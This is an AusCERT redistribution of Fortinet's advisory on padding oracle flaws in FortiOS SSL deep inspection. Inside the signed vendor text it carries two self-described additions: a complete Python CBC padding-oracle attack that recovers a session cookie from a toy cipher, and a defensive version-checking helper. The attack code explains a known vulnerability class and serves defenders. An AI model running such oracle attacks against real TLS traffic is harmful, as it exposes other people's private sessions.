-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
===========================================================================
AUSCERT External Security Bulletin Redistribution
ESB-2019.2765.2
FortiOS SSL Deep Inspection TLS Padding Oracle Vulnerabilities
28 February 2020
===========================================================================
AusCERT Security Bulletin Summary
---------------------------------
Product: FortiOS
Publisher: Fortiguard
Operating System: Network Appliance
Impact/Access: Access Privileged Data -- Remote with User Interaction
Resolution: Patch/Upgrade
CVE Names: CVE-2019-5592
Original Bulletin:
https://fortiguard.com/psirt/FG-IR-19-145
Revision History: February 28 2020: Vendor updated advisory
July 24 2019: Initial Release
- --------------------------BEGIN INCLUDED TEXT--------------------
FortiOS SSL Deep Inspection TLS Padding Oracle Vulnerabilities
IR Number : FG-IR-19-145
Date : Jul 23, 2019
Risk : 3/5
Impact : Information Disclosure
CVE ID : CVE-2019-5592
Summary
Multiple padding oracle vulnerabilities (Zombie POODLE, GOLDENDOODLE, OpenSSL
0-length) in the CBC padding implementation of FortiOS, when configured with SSL
Deep Inspection policies and with the IPS sensor enabled, may allow an attacker
who can intercept traffic passing through the FortiGate to decipher those TLS
connections. As with any padding oracle attack, the attacker must be on the path,
submitting modified records and observing the FortiGate's response; passively
monitoring the traffic is not sufficient on its own.
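The summary names the vulnerability class but not its mechanics. The following is an added example, not code from the advisory or from Fortinet, showing how a CBC padding oracle turns into plaintext recovery: a decryptor that reveals only whether the padding was valid is queried with forged ciphertexts until every byte of the record is recovered, without the key. In the FortiOS case the oracle is some observable difference in how the inspection engine handles a bad pad; the advisory does not say which signal, so the example models it as a plain yes/no. The block cipher is a constructed toy (a four-round Feistel network keyed with HMAC-SHA256) standing in for AES so that only the standard library is needed; the attack logic is cipher-agnostic. The key, IV and cookie plaintext are constructed demo data.

```python
# Added illustration, not FortiOS code: CBC padding-oracle decryption against a
# constructed toy cipher (4-round Feistel keyed with HMAC-SHA256, standing in for
# AES). The attack needs only an oracle answering "was the padding valid?".
import hashlib
import hmac

BLOCK = 16

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, i, half):  # keyed round function over one 8-byte half
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def _block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, i, r))
    return l + r

def _block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, i, l)), l
    return l + r

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, plaintext):
    data, prev, out = pkcs7_pad(plaintext), iv, bytearray()
    for i in range(0, len(data), BLOCK):
        prev = _block_encrypt(key, _xor(data[i:i + BLOCK], prev))
        out += prev
    return bytes(out)

def cbc_decrypt(key, iv, ciphertext):
    prev, out = iv, bytearray()
    for i in range(0, len(ciphertext), BLOCK):
        out += _xor(_block_decrypt(key, ciphertext[i:i + BLOCK]), prev)
        prev = ciphertext[i:i + BLOCK]
    return pkcs7_unpad(bytes(out))

def make_padding_oracle(key):
    """The leaky decryptor: the caller learns only whether the padding was valid."""
    def oracle(iv, ciphertext):
        try:
            cbc_decrypt(key, iv, ciphertext)
            return True
        except ValueError:
            return False
    return oracle

def _recover_block(oracle, prev, block):
    # Learn D(block) byte by byte from the end by forging the IV so the decryption
    # ends in valid padding (0x01, then 0x02 0x02, ...), then XOR with the genuine
    # previous block to obtain this block's plaintext. The key is never used here.
    inter = bytearray(BLOCK)
    for j in range(BLOCK - 1, -1, -1):
        pad = BLOCK - j
        forged = bytearray(BLOCK)
        for k in range(j + 1, BLOCK):
            forged[k] = inter[k] ^ pad
        for guess in range(256):
            forged[j] = guess
            if not oracle(bytes(forged), block):
                continue
            if j == BLOCK - 1:
                # 0x02 0x02 (or longer) is also valid padding: flip byte 14 and
                # re-ask so that only a genuine trailing 0x01 is accepted here.
                forged[j - 1] ^= 0xFF
                still_valid = oracle(bytes(forged), block)
                forged[j - 1] ^= 0xFF
                if not still_valid:
                    continue
            inter[j] = guess ^ pad
            break
    return _xor(inter, prev)

def padding_oracle_attack(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    recovered = b"".join(_recover_block(oracle, blocks[i - 1], blocks[i])
                         for i in range(1, len(blocks)))
    return pkcs7_unpad(recovered)

DEMO_KEY = b"constructed-demo-key-not-secret!"  # constructed; used only inside the oracle
DEMO_IV = bytes(range(BLOCK))
DEMO_PLAINTEXT = b"Cookie: session=constructed-demo-token-42"  # constructed record

def demo():
    ciphertext = cbc_encrypt(DEMO_KEY, DEMO_IV, DEMO_PLAINTEXT)
    return padding_oracle_attack(make_padding_oracle(DEMO_KEY), DEMO_IV, ciphertext)
```

For the three-block demo record the oracle is asked on the order of ten thousand times, each query being a forged ciphertext the attacker injects; that volume of active tampering is what "Remote with User Interaction" in the bulletin summary hides. Closing the oracle means making the padding-failure and MAC-failure paths indistinguishable to the sender, which is what the IPS engine update does.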
Impact
Information Disclosure
Affected Products
FortiOS when using the following IPS Engine versions:
IPS engine version 5.00000 to 5.00006
IPS engine version 4.00000 to 4.00036
IPS engine version 4.00200 to 4.00219
IPS engine version 3.00547 and below
Solutions
Update to IPS engine 3.00548, 4.00037, 5.00007 or above.
Specifically:
IPS Engine 3.00548 (or above) for the FortiOS 5.6 branch and branches below
IPS Engine 4.00037 (or above) for the FortiOS 6.0 branch
IPS Engine 5.00007 (or above) for the FortiOS 6.2 branch
An IPS Engine that includes the fix is built into FortiOS 5.6.11, 6.0.9 and
6.2.1, and into later versions in those respective branches.
To check the FortiOS IPS engine version:
* From the admin CLI console, run:
    diag autoupdate versions
  and read the version under the "IPS Attack Engine" heading of the output:
    IPS Attack Engine
    Version: x.xxxxx
* From the admin web UI:
    System -> FortiGuard -> IPS Engine -> Version x.xxxxx
For the IPS engine and FortiOS version compatibility chart, please refer to the
following link:
https://pub.kb.fortinet.com/ksmcontent/Fortinet-Public/current/FortiGate_6_0/fortios-fortiaps-ips-av-compatibility.pdf
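Checking a fleet by hand against the version ranges above is error-prone, so the following added helper (not Fortinet code) parses the output of the "diag autoupdate versions" command the advisory names and classifies the IPS Attack Engine build against the affected ranges exactly as listed. Only the "IPS Attack Engine" and "Version:" lines are taken from the advisory; the surrounding lines of the sample output, and the presence of other engines with their own "Version:" lines, are constructed assumptions about the command's output. The advisory's "4.00037 or above" wording overlaps the explicitly listed 4.00200 to 4.00219 affected range, so the helper treats the explicit ranges as authoritative and reports "fixed" only for builds outside them. It checks the engine build only; whether SSL Deep Inspection policies with an IPS sensor are actually in use, which the advisory states as the precondition, is a separate configuration review.

```python
# Added helper, not Fortinet code: classify a FortiGate IPS engine build
# against the affected ranges listed in FG-IR-19-145.
import re

# Affected IPS engine builds (inclusive) as listed in the advisory.
AFFECTED_RANGES = [
    ((5, 0), (5, 6)),      # 5.00000 to 5.00006
    ((4, 0), (4, 36)),     # 4.00000 to 4.00036
    ((4, 200), (4, 219)),  # 4.00200 to 4.00219
    ((3, 0), (3, 547)),    # 3.00547 and below
]
# First fixed build per branch: 3.00548, 4.00037, 5.00007.
FIXED_BUILD = {3: 548, 4: 37, 5: 7}

VERSION_RE = re.compile(r"^(\d+)\.(\d{5})$")

def parse_version(text):
    """'5.00006' -> (5, 6): engine branch and numeric build."""
    m = VERSION_RE.match(text.strip())
    if not m:
        raise ValueError("unrecognised IPS engine version: %r" % text)
    return int(m.group(1)), int(m.group(2))

def ips_engine_version(cli_output):
    """Pull the IPS Attack Engine version out of 'diag autoupdate versions'.

    Other engines also print a 'Version:' line (assumed here), so only the lines
    directly under the 'IPS Attack Engine' heading are examined.
    """
    lines = cli_output.splitlines()
    for idx, line in enumerate(lines):
        if line.strip() != "IPS Attack Engine":
            continue
        for follow in lines[idx + 1: idx + 6]:
            m = re.match(r"\s*Version:\s*(\S+)", follow)
            if m:
                return parse_version(m.group(1))
    raise ValueError("no IPS Attack Engine version found in output")

def classify(version):
    """'affected', 'fixed', or 'not listed' (a branch the advisory does not cover)."""
    major, build = version
    if any(lo <= version <= hi for lo, hi in AFFECTED_RANGES):
        return "affected"
    if major in FIXED_BUILD and build >= FIXED_BUILD[major]:
        return "fixed"
    return "not listed"

def assess(cli_output):
    version = ips_engine_version(cli_output)
    return {"version": "%d.%05d" % version, "status": classify(version)}

# Constructed sample of the CLI output; everything except the two advisory
# lines ("IPS Attack Engine" / "Version:") is an assumption about the format.
SAMPLE_CLI_OUTPUT = """\
AV Engine
---------
Version: 6.00142

IPS Attack Engine
---------
Version: 5.00006

IPS Attack Definitions
---------
Version: 14.00601
"""

if __name__ == "__main__":
    print(assess(SAMPLE_CLI_OUTPUT))
```

Feed it the captured command output from each device (for example collected over SSH) and treat anything reported as "not listed" as a prompt to re-read the vendor advisory rather than as a clean result.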
Revision History:
07-23-2019 Initial version
02-25-2020 Added FortiOS versions with built-in IPS Engines.
- --------------------------END INCLUDED TEXT--------------------
You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.
NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members. As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.
NOTE: This is only the original release of the security bulletin. It may
not be updated when updates to the original are made. If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.
Contact information for the authors of the original document is included
in the Security Bulletin above. If you have any questions or need further
information, please contact them directly.
Previous advisories and external security bulletins can be retrieved from:
https://www.auscert.org.au/bulletins/
===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072
Internet Email: auscert@auscert.org.au
Facsimile: (07) 3365 7031
Telephone: (07) 3365 4417 (International: +61 7 3365 4417)
AusCERT personnel answer during Queensland business hours
which are GMT+10:00 (AEST).
On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967
iQIVAwUBXliV7GaOgq3Tt24GAQhgVBAAmxQsnDJbw1KZq1SkmLr5BARSJx0RDuOQ
buYsbKXOA8ksU6Ggc4XFKCQEAynLXu9MrRLDcpAK6hYobxEc2EortjrebnS7VlYZ
EUv1DA9xacK70cq0e56Tm63VNpYxy+FWhKALt84fPf62iMSw5sxtEYgmzqO1azyt
wAyzAhYAOkGCdquF1VjzIlK0GKl4jVbGEu3c92FFD6F1pWmRR01bvfFh+sKk/4M6
XFWmeQZcCljHzAhpFz53IQqZK92xcYPy/+Ml/ec0NW/3CCpyI6kAhXKu2C3CFPa/
+698p6FM2DA5dP2GAGylwD3jeCjUqov9k4yxnLXUKAiRd+ukBS12EcXgl1C8WhhK
U1s8urAORcfmvpbt2xezLGba5u4dwbeGYwS/1t116zAgr6yBDb6g+epJdfMAn5Ok
ucF5StC5ZMF2vUF8fw6nZ3mLvw+Ju/Sd2ObMZXL/xsGbiYbyEji5Ofw0gTYPtOE0
CD88x9yeMIl0LfDYxbg2B2Qm79ENn8U6Ih8b/Rrj30D+ojI+tWTJ1CBoV0aNAa5v
cKMYD7nVCxiXDnrcXOm1rXQlpXDv0htRq3f3wjORN7th3vtYmJ4DsJZWNbZjKm5X
pXJxeEMai9ULEtojyjeghgNU0P2DudcbGCS54n3ysVUABWgHLcF48zrwVYAetCmw
tjuRWJTjExU=
=XG5j
-----END PGP SIGNATURE-----